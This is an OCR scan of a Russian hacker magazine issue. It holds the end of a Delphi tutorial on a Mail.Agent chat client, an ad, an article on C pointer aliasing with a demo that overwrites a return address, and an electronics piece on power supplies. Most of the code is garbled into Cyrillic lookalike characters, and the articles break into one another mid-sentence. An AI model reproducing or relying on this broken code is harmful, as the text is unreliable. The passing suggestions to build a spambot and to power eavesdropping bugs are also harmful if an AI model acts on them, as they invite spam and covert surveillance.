Оба клиента успешно соединились 
с сервером 




Будущий многооконный интерфейс 



ЧТО МОЖЕТ БЫТЬ ПРОЩЕ, 

ЧЕМ ПОЛУЧИТЬ СПИСОК КОНТАКТОВ? 

ргосесіиге ТРогшІ . СеШзегЬізЪ ; 
ѵаг 

і : іпДедег ; 

_ІІзег : АІІзег; 

Ьедіп 

ЬізОѴіеѵ^І . ІОетз . Сіеаг ; 

бог і : = 0 До _СопДасДЬізД . изегз_пит-1 сіо 
Ьедіп 

_Ьзег : = _СопДасДЬізД . изегз_іс! [ і ] ; 
ѵ^іДЬ ЬізДѴіеѵ^І . ІДетз . АЬЬ Ьо 
Ь едіп 

СарДіоп : = _Ьзег .изег_піск; 

ІшадеІпЬех := СеДЗДаДизІтаде (_Ьзег . изег_ 
зДаДиз, _изег . изег_зДаДиз_іЬ) ; 
епЬ; 
епЬ; 
епЬ; 



чата с закладками. Каждая такая закладка — это чате опреде- 
ленным собеседником. Оченьудобно и позволяет избавиться от 
проблемы «завала» всего рабочего стола «окнами». Я решил не 
отступать от этой идеи и реализовать в нашем примере подобный 
интерфейс. Сейчас я подробно расскажу, как это делается. 
Создай новую форму и брось на нее один компонент 
ТРадеСопДгоІ (вкладки не создавай) и одну кнопку. У ком- 
понента ТРадеСопДгоІ установи свойство Аіідп в аІТор 
(растянуть по верху). Теперь растяни этот компонент по всей 
оставшейся части формы, но не забудь оставить немного места 
под кнопку. По ее нажатию мы будем отправлять сообщения 
активному в данный моментсобеседнику. Еслиты запутался с 
расположением компонентов, то не парься, а просто взгляни 
на рисунок и по нему подгони свою форму. 

Как за кончишь с дизайном, возвращайся к модулю главной 
формы и объяви в ней новую процедуру: СгеаДеЫемТаЬ 
(изег_ешаі1 : зДгіпд; ДехД : зДгіпд) , где изег_ешаі1 
— е-таіі пользователя, от которого пришло (или которо- 
му хотим отправить) сообщение. Этот мыльнику нас будет 




> Ипкз 

Дополнительный 
исходник (на чистом 
ѴѴІпЗоск АРІ)ты мо- 
жешь скачать с сайта 
ѵѵѵѵѵѵ.ѵг-опііпе.ги 
после выхода журнала 
в свет. 




Какобычно, исходник 
примера, а также ком- 
понент можно взять на 
нашем диске. 



Основная начинка процедуры СеРІІзегЬізР ( ) — пробеж- 
ка по структуре типа АСопЪасЦ_ЬізЪ, содержащей список 
контактов, и добавление всех найденных контактов в ЫвЬ/іеѵѵ. 
Обрати внимание, что в примере из структуры я извлекаю 
лишьники пользователей. При программировании реаль- 
ного приложения этим можно не ограничиваться. Например, 
можно получить дату рождения пользователя, знакзодиака, 
е-таіі и т.д. (полное описание структуры смотри во врезке). 
Добавляя очередной контакт в ьізДѴіем, я определяю его 
статус и уже на основании его устанавливаю соответству- 
ющую картинку. Чтобы облегчить этот процесс, я написал 
функцию СеЪЗЪаІіизітаде ( ) . В качестве параметров ей 
нужно передать статус и идентификатор статуса пользователя. 
Результатом будет число, соответствующее определенному 
индексу картинки вТІшадеЬізЪ. Исходный код функции 
СеЪЗДаІіизітаде ( ) приведен во врезке. 

0 ЧАТИМСЯ 

Получить список контактов в красивом виде — лишь полдела. 
Главная функция любого ІМ — предоставление возможности ком- 
фортного общения, для чего программисты обычно создаютокно 



Получаем индекс 
статусной картинки 

ЕипсгіопТРогт1.Сеі:8шшзІта§е(зі:аі:из: іше^ег; аДѵ8штзІсІ:зі:гіп§): іше^ег; 
Ье^іп 

Цезий : = 1 ; 

Сазе Зііатз Об 

8ТАТО8_ОЖШЕ: КезиЙ : = 0; 

8ТЛШ8_ОРРІЛКЕ: КезиЙ : = 1; 

8ТАТІЭ 8_АѴѴАУ: КезиЙ : = 2; 

8ТАТО8_РЕАС_ІЫѴІ8ІВЕЕ : КезиЙ : = 5; 

8ТЛШ8_ЕГ8ЕК_ВЕРІКЕВ : 

Ъе^іп 

Й асІѵЗнатзІсІ = ‘знаШЗ-сКаР гііеп КезиЙ : = 3; 
й асІѵЗнатзІсІ = ‘зИаШз_с1псГ гііеп КезиЙ : = 4; 
епсі; 
епсі; 
еп 6 .; 



ХАКЕР 08 /116/ 08 



► 101 







Описание важных 
структур 

АСопИасИ_ІЛ5И 

АСопі:асі:_Ілзі: = гесогсі 
//Количество групп 
§гоир_пит: іпііе^ег; 

//Массив структур типа АСгоир 
§гоир5_ісі: аггау[0..20] оЕАСгоир; 

//Массив структур типа АІІзег 
и5ег5_ісі: аггау[0..1023] оі/Шзег; 

//Общие количество контактов 
шегз_пшп: іпііе^ег; 

АЕТзег = гесогсі 

изег_йа§з: іпі:е§ег; 
изег_§пит: іпііе^ег; 

//Етаіі пользователя 
изег_таі1: зтп§; 

/ /№ск пользователя 
изег_піск: зі;гіп§; 

//Имя пользователя 
изег_пате: зтп§; 

//Фамилия пользователя 
изег_1азтате: зтп§; 

//Дата рождения 
изег_ЪсІау: зі:гіп§; 

//Место жительства 
изег_1осаі:іоп: $тп§; 

//Флаги 

зегѵег_Па§з: іпііе^ег; 

//Статус пользователя 
изег_5і:аі:и5: іпііе^ег; 

//Телефон 
изег_р]топе: зтп§; 

//Идентификатор пользователя 
изег_ісі: іпі:е§ег; 

//Идентификатор статуса 
изег_5і;аі;и5_ісі, 

//статус пользователя 
изег_зі;атз_пате, 

//Оисание статуса 
изег_зі;атз_сіе5с: зтп§; 

//Идентификатор клиента пользоваля 
изег_с1іепі;_ісі: зі;гіп§; 
епсі; 

отображаться в качестве заголовка закладки, тем самым, идентифицируя 
собеседника. Смотрится не очень красиво (в реальном приложении лучше 
отображать ник пользователя). Весь код этой незатейливой процедуры 
ты можешьувидеть на соответствующей врезке. Быстренько начинай его 
переписывать, не забывая при этом иногда возвращаться к тексту статьи за 
разъяснениями. 

Изначально мы не можем знатьточного количества собеседников, для 
которых в окне чата будем создавать за кладки. Поэтому новые вкладки 
логичней всего создавать динамически — по мере необходимости. Скорее 
всего, после прочтения последнего предложения тебе стало смешно, 

— мол, какеще втакой ситуации можно поступить. Оказывается, можно. 
Однажды мне попался исходник довольно симпатичного асечного клиен- 




та. Когда я принялся его изучать и добрался до формы обмена сообщени- 
ями, — я ужаснулся. Автор программы создал почти сотню (!) вкладок и по 
мере необходимости игрался со свойством ѵізіЫе. Но что-то я немного 
отвлекся. Поскольку все элементы формы сообщений мы будем создавать 
динамически, то на первом этапе нам нужно определить, какие потребует- 
ся создавать элементы управления. Обычно в подобных окнах размещают 
пару компоненттипа тмешо (ткісЬЕсііі: и всевозможные клоны). Один 
используется для отражения всей истории переписки, а второй — для 
ввода текста отправляемого сообщения. Помимо элементов ввода нам 
придется создавать новую закладку в компоненте РадеСопЪгоІ. Итак, 
подведем итог. Для создания новой вкладки нам нужно создать три 
компонента: два ТМешо и один ТТаЬЗЛееД. По этой причине в разделе ѵаг 
моей процедуры я объявил три соответствующие переменные: _Ыеѵ^ТаЬ 
типа ТТаЬЗкееД (новая закладка для РадеСопРгоі), _Ыеѵ7ТехЪМешо 
типа ТМето (ввод текста для отправки) и _ЫехѵС1іаі:Мето (для отображе- 
ния всей переписки) аналогичного типа. По моему замыслу, эта проце- 
дура должна вызываться каждый раз при получении нового сообщения. 
Следовательно, перед созданием новой вкладки нужно удостовериться, 
что для автора полученного сообщения еще не была создана закладка. 

Для проверки я запускаю цикл (Рог і:=0 До РогтЗ . РадеСопРгоІІ . 
РадеСоипЪ-і), которой пробегает по всем существующим вкладкам и 
сравнивает их заголовок с е-таіі отправителя. Если совпадение найдено, 
то нет смысла создавать еще одну закладку. Нужно просто добавить в 
компонент СііаШетоХ полученный текст. Поскольку полного имени 
компонента (вместе с индексом) мы не знаем, то нам придется его найти с 
помощью метода РіпсІСотропепР ( ) элемента, на котором мы, собс- 
твенно, и ищем компонент. В нашем случае компонент СЬаРМешо будет 
располагаться на компоненте ТРадеСопРгоІ, именно поэтому метод 
я вызываю следующим образом: РогшЗ . РадеСопРгоІ . Радез [і] . 
РіпсіСотропепР ( ' СЬаШето ' + ІпРТоЗРг ( і+1) ) . В качестве одного 
единственного параметра для метода РіпсІСотропепР ( ) я передаю 
имя искомого компонента, плюс его индекс, который будет равен индексу 
текущей закладки + 1 (так как первая вкладка имеет индекс 0). Компо- 
нент найден, —теперь надо добавить в него полученный текст. Чтобы это 
сделать, я привожу полученный в результате поиска объект ктипу ТМето, 
а затем вызываю метод свойства Ыпев — Асій ( ) . Дальше все просто 
— добавив полученный текст, вызываю метод БИоѵѵ формы сообщений и 
выхожу из процедуры. Мы рассмотрели варианте найденной вкладкой. 
Аесли она еще не была создана? Конечноже, нужно ее создать! Порядок 
очереди создания новых элементов будеттаким: 

1. Новая вкладка (тЫемТаЬЗЬеер); 

2-Новый элементхранения истории переписки (тыемСЪаРМето); 

3. Новый элемент для ввода текста для отправки (тыеѵ/ТехРМешо). 

Каждый визуальный компонент в ОеІрЫ — это обычный объект, который 
первым делом нужно инициализировать (выделить память). После можно 
заполнять все свойства, прикручивать обработчики событий и т.д. Единст- 
венный нюанс при создании визуальных компонент— необходимость 
«вставки» (указание родителя) этого компонента на любой другой. Иначе, 
как можно догадаться, — компонент не отобразится. Чтобы вставить вновь 
созданный компонентв форму, необходимо лишь вызватьу формы метод 
іпзегРСопЪгоІ ( ) . В качестве единственного параметра нужно указать 
ссылку на проинициализированный элемент управления. 

0 НАРРУ ЕЫО 

Лекцию рассмотрения внутренностей протокола ММР можно считатьокон- 
ченной. Тебе остается переваритьзнания и воспользоваться ими в своих 
хацкерских целях. Полученной инфы вполне хватит для написания полно- 
ценного МаіІ.Адепі’а или спамбота. Ксожалению, спецификация протокола 
уже давно не обновлялась, а значит, шагать в ногу с МаіІ.АдепЕом, увы, не 
получится. Будем надеяться, что девелоперы МА расщедрятся и полностью 
откроют протокол со всеми вкусностями (передача видеоданных и т.д.). Пока 
нам остается лишь пользоваться тем, что есть. На этой немного грустной 
ноте я хочу попрощаться и пожелатьтебе больше позитива и поменьше 
АссезвѴіоІібоп. Пока! 

Р.З. Автор выражает огромную благодарность Алексею Панову за идею 
статьи и отличный компонент для работы с ММР. зц 
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С0К5А О РС 









КЛИКНИ НА ГАЗ! 



оп-Ііпе гонки на ѵѵѵѵѵѵ.тахі-гасіпд.ги 





Многочисленные призы 
от АІріпе 



Махі Васіпд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Касіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аибіо & МоЬіІе Месііа от АІріпе, страховку РОСНО на свое авто. 

А в конце года лучший получит реальный автомобиль - ОреІ Согза! 



МАХІ КАСІІЧС. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.тахі-гасіпд.ги и ѵѵѵѵѵѵ.тахі-1:ипіпд.ги 



РОСНО 



в составе АНіапг (Ш) 



Ягыпіпд 



тзп 







ТРЮКИ в 
ОТ КРЫСА 



СИШНЫЕ ТРЮКИ 



Вол ь н ч 

сказатель становится источником непредсказуемых побочных эффектов! 



I 



В одну реку нельзя войти дважды 



Статический анализ отдельно взятой функции (неважно — представ- 
ленный в виде исходного кода или дизассемблерноголистинга) справляется 
только с локальными переменными и обламывается науказателях, значение 
которых невозможно вычислить на стадии трансляции (указатель — не конс- 
танта) и которые обрабатываются уже в гип-ііте. 

Всякий неконстантный указатель способен менять логику работы нетолько 
отдельно взятой анализируемой функции, но даже и всей программы в целом! 
Разобраться, чтожедействительноделаеттотили иной указатель, можно 
только с помощью отладчика или... статической трассировки всего исходного 
текста — а это фактически равносильно исполнению программы на эмулиру- 
ющем отладчике. 

Начинающие хакеры недооценивают коварствоуказателей, за что потом 
расплачиваются изматывающей отладкой, отнимающей намного больше 
времени, чем кодирование. Хотите наглядный пример? Пожалуйста! 



ИСХОДНЫЙ КОД ЗАГАДОЧНОЙ ФУНКЦИИ 

Роо(іпР *агд_а, іпС *агд_Ъ) { 

ргіпДб ( " 1 : -> %08ХІт: %08ХЪ.\п" , *агд_а, *агд_Ъ) ; 



*агд_а = *агд_Ь; // (1) 

ргіпДР ( " 2 : -> %08ХІт : %08X]т\п ,, , *агд_а, *агд_Ь) ; 
*агд_а = *агд_Ъ; 

// (2) — может иметь другое действие, чем (1) 
ргіпЦб ( " 3 : -> %08Х1т : %08X]т\п ,, , *агд_а, *агд_Ь) ; 



*агд_а = *агд_Ъ; 

// (3) — может иметь другое действие, чем (1, 2) 
ргіпЦб ( " 4 : -> %08ХІт: %08ХЪ.\п" , *агд_а, *агд_Ъ) ; 



*агд_а = *агд_Ь; 

// (4) — может иметь другое действие , чем (1, 2, 3) 
ргіпДР ( " 5 : -> %08ХІт : %08X]т\п ,, , *агд_а, *агд_Ь) ; 

} 

Казалось бы, такая простая функция Роо ( ) — всего четыре команды 
*агд_а = *агд_Ъ (отладочные вызовы ргіпРР не в счет). Разве не 



очевидно, что здесь происходит копирование ячейки *агд_Ъ в ячейку 
*агд_а, для «надежности» повторяемое четыре раза? Тогда почему 
оптимизирующие компиляторы (например, М5 ѴС) даже на максимальном 
уровне оптимизации не выкидывают вторую и все последующие опера- 
ции присвоения — в чем легко убедиться, заглянув в дизассемблерный 
листинг? 

Предположение, что все команды «*агд_а = *агд_Ъ» идентичны 
— ошибочно. Оно базируется на неявном допущении, что агд_а и 
агд_Ь указывают на различные ячейки, чего нам никто не гарантирует. 
И что никаким боком не вытекает из анализа самой функции Роо ( ) , 
принимающей указатели агд_а и агд_Ь как аргументы. Понять, что же 
действительно здесь происходит, можно, только обратившись к мате- 
ринской функции, которая в данном случае выглядиттак: 

ХИТРЫЙ ВЫЗОВ ФУНКЦИИ РООО 
В ПРОГРАММЕ 0ѴЕВІ_АРРЕ0-Р0ІІЧТЕВ5.С 

іпР ЬиР [ 3 ] = { 0 , - 1, 0}; 
гпаіп ( ) 

{ 

Роо(ЬиР, ( іпР* ) ( ( ( сйаг* ) Ьиб) +1)); 

} 

Компилируем программу из командной строки, как обычно (сі.ехе 
оѵегіарреб-роіпіегз.с), запускаем и смотрим результат. По многочис- 
ленным просьбам читателей, не осиливших геасіте к М іеговой Ѵівиаі 
Зіибіо или запускающих ѵсѵагзЗ 2 . ЬаД из РАН 'а, а не из отдельного 
стсі . ехе, автор решил снабжать каждый приводимый листинг .бвѵѵ/. 
б вр- проектам и, упрощающими сборку программы до предела (клавиша 
<Р7> в Студии). 

Но вернемся кобсуждению полученного вывода. Он намного интереснее, чем 
это можно предположить из анализа исходного текста: 

РЕЗУЛЬТАТ РАБОТЫ ПРОГРАММЫ ОѴЕВЬАРРЕО-РОШТЕВЗ.С 

1 : -> ООООООООйгРРООООООй 

2 : -> РРООООООЬгРРРРООООЪ 

3 : -> РРРРООООЬгРРРРРРООЪ 

4 : -> РРРРРРООЪ. : РРРРРРРРЪ. 

5 : -> РРРРРРРРйгРРРРРРРРй 
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Воттебе и раз! Значение ячеек *агд_а и *агд_Ь меняется во всех четырех 
итерациях, образуя узор наподобие «елочки». А все потому, — что функции 
іоо ( ) переданы указатели на перекрывающиеся (оѵегіарреб) ячейки памяти, 
и операция присвоения меняет не только приемник (іагдеі;), но и воигсе (ис- 
точник) ! Теперь понятно, почему возникает«елочка»: раз присвоение меняет 
источник, то повторное присвоение даст иной результат. Точнее, может дать, но 
может и не дать. Тут все от содержимого источника/приемника зависит. 

Вот потому статический анализ на указателях и «отдыхает». 



ный пример, — функциюЬаг ( ) , состоящую из операции «*гек_асМг = 
агд_а» (задействует один-единственный указатель). Ну и какого подвоха 
от нее ожидать? Да любого! Это же указатель! И писать он способен в 
абсолютно любую ячейку памяти, куда только разрешена запись. Может 
подменять адрес возврата из функции. Это используется для скрытой пе- 
редачи управления многими защитными механизмами или представляет 
собой грязный «хак», вставленный сотрудником, который не хочет, чтобы 
коллеги понимали, как работает написанный им код. 

Собственно говоря, сама функция Ьаг ( ) не делает ничего интересного. 
Все трюкачество сосредоточено в вызывающем коде, который в про- 
стейшем случае выглядиттак — смотри «хитрый вызов функции іоо ( ) в 
программе оѵегіарреб-роіпіегв.с». Вопрос: что выводит эта программа 
на экран? Даже динамический анализ с отладчиком в руках требует на- 
пряжения мозговых извилин и знания особенностей языка. Хи нт: данный 
пример не закладывается на конкретный компилятор и сохраняет свою 
работоспособность даже при портировании на другие 32-битные системы. 
С формальной точки зрения, это не та кой уж и грязный хак (примечание: 
для упрощения кода в программе использована ассемблерная вставка, но 
при желании можно реализовать и на чистом Си). 

ИСХОДНЫЙ КОД ПРОГРАММЫ СО СКРЫТОЙ 
ПОДМЕНОЙ АДРЕСА ВОЗВРАТА 

// зЬйсаІІ, зіпсе ѵлэ пеесі До Ыоѵі ир ЕЬе агдз 

зОсІсаІІ Ьаг ( іпі. агд_а) 

{ 

зСаРіс іпі соипк; 

ргіпРб ( " %Х : -> %08ХЬ : Ьеііо Ьаг\п" , ++соипк, агд_а) ; 

} 

// ссіесі, зіпсе ые Ьоп'Ц ѵ^апР Ро Ыом ир РЪ.е агдз 

ссіесі Ьаг (іпР агд_а, іпР *геР_ас!с1г) 

{ 

*геР_аскіг = агд_а; 

} 

гпаіп ( ) 

{ 

Роо(ЬиР, (іпО*) ( ( (сЬаг*)Ьиі) +1)); 

азш 

{ 

ризЬ еах 

; Рог Ьаг. КЕТЕ 4 (зесопЬ разз, сіишшу агд) 
ризіі оРРзеР пехР 

; Рог Ьаг. КЕТЕ 4 (зесопсі разз, зишр Ро пехР) 

шоѵ еах, езр 



ІХардкорные извраты с адресом возврата 



"Оправившись после «культурного шока», рассмотрим более слож- 



; саісиіаре РЬе роіпРег Ро. . . 
зиЬ еах, ОСЬ 

. .РЬе геРигп асЫгезз оР Ьаг 
ризЬ еах 

; Рог Ьаг . геР_аскіг АЕБ Ьаг. КЕТ 4 (Ьишшу агд) 
ризЬ оРРзеР Ьаг 

; Рог Ьаг.агд_а АЕБ Ьаг. КЕТ 4 (зишр Ро іРзеІР) 
саіі Ьаг 

; до-до Ьаг Ьаг :-) 

пехР : 

; Ьоп'Р пееЬ ЗЬВ ЕЗР, XX — зРаск із ок Ьие Ро КЕТ4 

} 

Компилируем программутакже, как и раньше (для экономии места она реа- 
лизована все втомже файле оѵегіарреб-роіпіегв.с), и смотрим на результат 
ее выполнения: 

1 : -> 0012ЕЕб0Ь :Ье11о Ьаг 

2 : -> 00000019Ь:Ье11о Ьаг 

Мы морально подготовлены ктому, что послезавершенияЬаг ( ) вызы- 
вается функция Ьаг ( ) (это вытекает из названия указателя геР_асЫг и 
явной засылке адреса Ьаг командой ризЬ оРРзеР Ьаг). Но тот факт, что 
Ьаг ( ) вызывается дважды — уже сюрприз! Говорю же, здесь не баг, а за- 
ранее просчитанный ход, который оченьтрудно распознать даже матерым 
программистам. 

Отладчик покажет полную картину происходящего, а чтобы не сбиться с 
пути, автордастнесколькохинтов. Функцияшаіп ( ) готовит стек, засовы- 
вая в него незначимый аргумент-пустышку (битту агд), за которым следует 
адрес выхода из функции (смещение метки пехс). Далее засылается тща- 
тельно рассчитанноесмещениеадреса возврата изЬаг ( ) , передаваемое 
как аргумент г ек_аЬЬг и указатель на Ьаг (аргумент агд_а). 

И происходит вызов функции Ьаг ( ) с форсированной спецификацией 
сбесі-соглашения, определяющего порядокзасылки аргументов в стек и 
снимающего сЬаг ( ) обязанности по вычистке аргументов из стека после 
завершения. Команда «*гек_асМг = агд_а; » подменяетадрес возврата 
изЬаг ( ) , заменяя его указателем на функциюЬаг ( ) , которая и вызыва- 
ется при завершении Ьаг (). Причем, стек остается втомже состоянии, 
в каком он был на момент вызова Ьаг ( ) —то естьс двумя аргументами: 
указателем на адрес возврата изЬаг ( ) , ну, теперьужеЬаг ( ) , и адресом 
самой функции Ьаг ( ) , которая (это очень важно!) форсирована на зібса II- 
соглашение, что обязывает ее вычищатьаргументы из стека позавершению. 
При первом выполнении функцииЬаг ( ) она выводитаргументагд_а 
(указатель на адрес возврата). Второй аргумент трактуется какадрес возврата 
в материнскую функцию. В данном случаетаковой является сама Ьаг ( ) , 
указатель на которую следует за агд_а. Следовательно, при выходе из функции 
Ьаг ( ) она выталкиваетагд_а из стека вместе с адресом возврата на саму 
себя. В результате происходитее повторный вызов, нотеперь на вершине 
стека — фиктивный аргумент-пустышка и указатель на меткупехк, куда и 
передается управление. 

Такая вот замысловатая арабская вязь кода. Что тут сложного? После 
объяснения, конечно, ничего. Но сколько людей способны сказать, что 
делаетэта программа по одним лишь исходным текстам беззапуска ее на 
выполнение? ^ 
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О ВКУСНОЙ 



ОРОВОИПИ 



іервая статья про основы электроники прошла на ура, поэтому, следуя много ■ -| 



іисленным пожеланиям, продолжаю в том же духе. С чего начинается разра-. 






ротка люоого девайса/ С продумывания источника питания. Это один из важ- 
інеиших этапов, ведь от него зависит, насколько надежным в раооте оудет твои • 



еваис 



уществует масса способов решить проблему питания устройс- 
тва. Чтобы тебе было из чего выбрать, я постараюсь макси- 
мально подробно описать каждый из них. 

В АВТОНОМНОЕ ПЛАВАНИЕ 

Еслиты разрабатываешь подслушивающееустройство или что-то мобиль- 
ное, чего нельзя воткнуть в розетку, тотебетолько одна дорога — батарей- 
ное питание. Аккумуляторов и батареек ныне разработано на все случаи 
жизни. 

С батарейками все просто: если соединить их последовательно, цепочкой 
от плюса к минусу, то напряжение складывается. Аесли связать парал- 
лельно, объединив плюсы и минусы, то получим увеличение емкости 
батареи. Главноетут, чтобы батареи имели равную свежесть. Ато если в 



такой связке попадется одна полудохлая, с более низким напряжением, то 
остальные тут же подсядут до ееуровня. Особой любовьюу меня пользуют- 
ся батарейки отматеринских плат. Они выдаютЗ Вольта, что в подавля- 
ющем большинстве случаев достаточно для запитки микроконтроллера 
(Тіпу или Меда с индексом І_) или еще какой мелкой электроники. Кстати, 
мелкие батарейки на 9-12 Вольт (такие обычно стоят в брелках авто-сиг- 
нализаций) внутри содержат стопку обычныхтаблеточных батареекдля 
часов. Так что в следующий раз лучше нетратить бабло на дорогущую 
12-вольтовую батарейку, а купить «матрас» китайских таблеток по рублю 
за штукуй смотать их скотчем. Еще классными батарейками снабжались 
кассеты от фотоаппаратов Роіагоісі. Они были плоскими, выдавали девять 
Вольт и обладали чумовой энергоемкостью. Особенно их любили фрикеры, 
изготовлявшие подслушивающие устройства — такую батарейку вместе с 
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жучком легко сделать в виде картонки, которая закидывается куда-нибудь 
за шкаф и работает порой до двух -трех месяцев. 

Впрочем, на мой взгляд, батарейки уже давно стали моветоном. Где только 
можно, я перехожу на аккумуляторы. Самые лучшие для мобильного 
применения — это литий-ионные (І_і-Іоп). Неудивительно, что их приме- 
няют во всех современных сотовых. Но на первых порахя бы не рекомен- 
довал связываться с данным типом аккумуляторов: у них слишком хитрый 
алгоритм заряда, требующий специального чипа либо сложной прошивки 
вуправляющем контроллере. Ктомуже, необходимо реализовывать 
защиту от полного разряда. Чуть ошибешься при зарядке или дашь ему 
сесть в ноль, — аккумулятор вспухнет и придет в негодность. С никель- 
металлогидридными (ІЧіМН, они же — пальчиковые аккумуляторы втвоем 
плеере) батареями прощещам надотолько ограничиватьзарядныйток, что 
реализуется микросхемой МАХ 71 2 — это специальный чип, заточенный для 
изготовления за рядных устройств под КІІМН-аккумуляторы. Если интерес- 
но, то печатную плату и схему зарядного устройства для таких аккумулято- 
ров я положил на диск. 

Для долговременного питания, особенно когда габариты и вес не имеют 
значения, лучше использовать 5І_А-аккумуляторы. Это такие здоровенные 
черные кирпичи с клеммами, они стоят во всех ІІРЭ’ах.У меня в домашнем 
роботе питание сделано именно от5І_А-аккумулятора. По конструкции и 
принципу эти аккумуляторы не отличаются отавтомобильных, разве что 
обладают герметичным корпусом. Они обладают большой емкостью, а глав- 
ное, им нетребуется зарядного устройства. В простейшем случае, чтобы 
зарядитьтакой аккумулятор, его надо подсоединить к источнику питания, 
выдающему напряжение чуть ниже номинала аккумулятора. То есть, если 
аккумулятор рассчитан на двенадцать Вольт, то зарядникдолжен быть на 
одиннадцать с половиной. Ну, еще нужно токоограничивающий резистор 
Ом на сто поставить (только брать надо резистор помощнее, Ватта на два). 
Они здоровыетакие, керамические. Самое главное, не подавать на аккуму- 
лятор напряжение более, чем его номинал — вскипити взорвется. 



1 __ ві 

Та самая КРЕН'ка в разных корпусах 



из двух катушек, которые намотаны на общий металлический сердечник. 
Прикол втом, что переменный электрический ток, проходя по одной обмот- 
ке, вызывает в сердечнике колебания магнитного поля, а эти колебания, 
за счетявления магнитной индукции, наводятпеременныйтокво второй 
катушке. Соотношение напряжений на входе и выходе трансформатора 
зависит отсоотношения числа витков первой и второй обмотки трансфор- 
матора. Так, трансформатор с соотношением обмотокодин кдесяти при 
подключении к розетке даст на выходе двадцать два Вольта. Трансформа- 
торами можно поживиться в убитых колонках или блоках питания разных 
магнитофонов, или старых сетевых адаптеров. Не стоит выдирать их из 
древних ламповых телеков, они там в основном повышающие, а тебе нужен 
понижающий. Также важно не перепутать обмотки высокого и низкого 
напряжения. Когда будешь выдирать из хлама трансформатор, запомни, 
каким местом он подключался к розетке и где у него был выход. Обмотки 
можно определять тестером в режиме замера сопротивления (у обмотки 
высокого напряжения сопротивление выше). Обязательно замерьтестером 
напряжение на выходетрансформатора, не забыв при этом поставить 
тестер на измерение переменного напряжения. 

Еще есть такой тип, как импульсныетрансформаторы — еготы найдешьв 
комповом блоке питания. Этоттип обладает малыми габаритами, но рабо- 
тать можеттолько на больших частотах. Поэтому в комповом блоке питания 
сетевое переменное напряжение сначала выпрямляется, потом перево- 
дится опять в переменное, ноуже повышенной частоты. Высокочастотный 
ток напряжением 220 Вольт прогоняется через импульсный трансформатор, 
где понижается. Ауж потом снова выпрямляется и идет на выход. Сложно, 
зато позволяет резко снизить габариты и вес при передаче больших мощ- 
ностей — у классического низкочастотного трансформатора сувеличением 
передаваемой мощности резко возрастают размеры магнитопровода. 
Именно поэтому старые телевизоры та кие тяжелые — там много мощных 
низкочастотных трансформаторов. 



Н ВЫПРЯМЛЯЕМ! 



В НЕИССЯКАЕМАЯ СИЛА РОЗЕТКИ 

Не одними батарейками жив фрикер. Зачастую необходим стационарный 
источник питания или девайс, которому нужно работать долгие месяцы. Тут 
на помощь приходит блок питания и розетка в качестве источника энергии. 
Одно плохо — напряжение в розетке малотого, что переменное, такеще и 
целых двести двадцать Вольт! А нам в подавляющем большинстве случаев 
надо постоянное — и не более пяти, двенадцати Вольт. Приходится горо- 
дить преобразователи и выпрямители. 

В ПОНИЖАЕМ! 

Наиболее простой путь, можно сказать, классика жанра, — обычныйтранс- 
форматорный блок питания. Трансформатор — это такой девайс, состоящий 



Допустим, трансформаторты воткнул, напряжениеуменышил. Остается 
еще одна проблема — напряжение-то переменное! Что делать? Тутесть 
два пути. Первый — последовать совету моего препода по электронике 
и поставитьтолкового студента, чтобы он за пиво переключал проводки 
туда-сюда с частотой пятьдесят раз в секунду. Поскольку недостатки 
данного метода очевидны, то этот процесс надо как-то автоматизировать. 
Поднимай подшивку ][ и ищи первую часть«электронных исходников», а 
конкретно — раздел про диоды. Если не нашел, то напомню, что диод — это 
такая фиговина, которая пропускаеттоктолько в одном направлении. В 
переменном напряжении ток идет по синусоиде, сначала в одну сторону, 
потом плавно уменьшается до нуля и начинает идти в другую сторону. И 
потом снова обратно. И так — пятьдесят раз в секунду (если мы говорим 
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Канализационный пример ШИМ-регулятора^» 
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о розетке, где частота 50 Гц). Если поставить на его пути диод, то ток 
сможет идти только по одному пути: полпериода ток идти будет — прямое 
направление для диода, а полпериода идти не будет вообще, диод не 
даст. Выход из этой ситуации есть — диодный мост. Это когда соединяют 
диоды таким образом, что какое бы направлениеутока не было, диоды его 
всегда развернут и направят в одном направлении. Вот и выходит, что при 
положительной полуволнеток идет по одному плечу моста, а при отрица- 
тельной — по другому, но неизменно в одну сторону. Диодный мостовой 
выпрямитель стоит почти во всех блоках питания. Есть тут, правда, одно 
за падло — после диодного моста напряжение не ровное, а как бы частыми 
импульсами — следствие синусоидальности исходного напряжения. Что 
делать? Правильно, курить первую часть электронных исходников, ноуже 
раздел про конденсаторы и индуктивности. 

Если поставить на выходе параллельно конденсатор, да еще катушку 
последовательно, то конденсатор будет подпитывать нагрузку в момент 
провала напряжения и заряжаться на пике, а катушка задержит все 
пульсации и неровности, которые останутся после конденсатора. Впрочем, 
зачастую катушку не ставят вовсе, ограничиваются конденсаторами. Кон- 
денсаторы я рекомендую поставить разные. Один-два электролитических 
(это такие большие бочки с явноуказанным плюсом, поэтому полярность 



соблюдать обязательно). И керамических пару штук (такие желтенькие 
круглые, сторчащими выводами). Электролиты хорошо отрабатывают на 
крупных просадках напряжения, а керамика лучше справляется с мелкими 
помехами. 

Н СТАБИЛИЗИРУЕМ! 

Но обычно одного трансформатора и выпрямителя мало. Необходимое 
напряжение может быть совершенно разным, а найти трансформатор под 
нестандартное напряжение сложно; они на выходе имеют от семи до двад- 
цати Вольт, а нам зачастую надо пять, а то и три. Да и напряжение выхода 
с трансформатора зависит от напряжения питающей сети, а оно далеко 
не всегда хваленые двести двадцать. Поэтому потребуется стабилизатор. 
Стабилизатор — это такая схема, задача которой всегда поддерживать 
выходное напряжение равным определенной величине, вне зависимости 
оттого, что на входе. Как правило, стабилизатор работает на понижение 
— то есть ему на вход надо подать напряжение несколько больше того, что 
будет на выходе. В таком случае у него будет некоторый запас по регули- 
рованию. Впрочем, существуют и повышающие схемы. Самый простой и 
дубовый линейный стабилизатор — 6М 7805, он же 7805, в простонародье 
КРЕНка, названый так в честь микросхемы КР142ЕН5А. Буржуи его еще 
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называют Ыпеаг. Его достоинство в том, что он стоит крайне дешево, имеет 
совершенно элементарную схему подключения и надежен, как кувалда. 
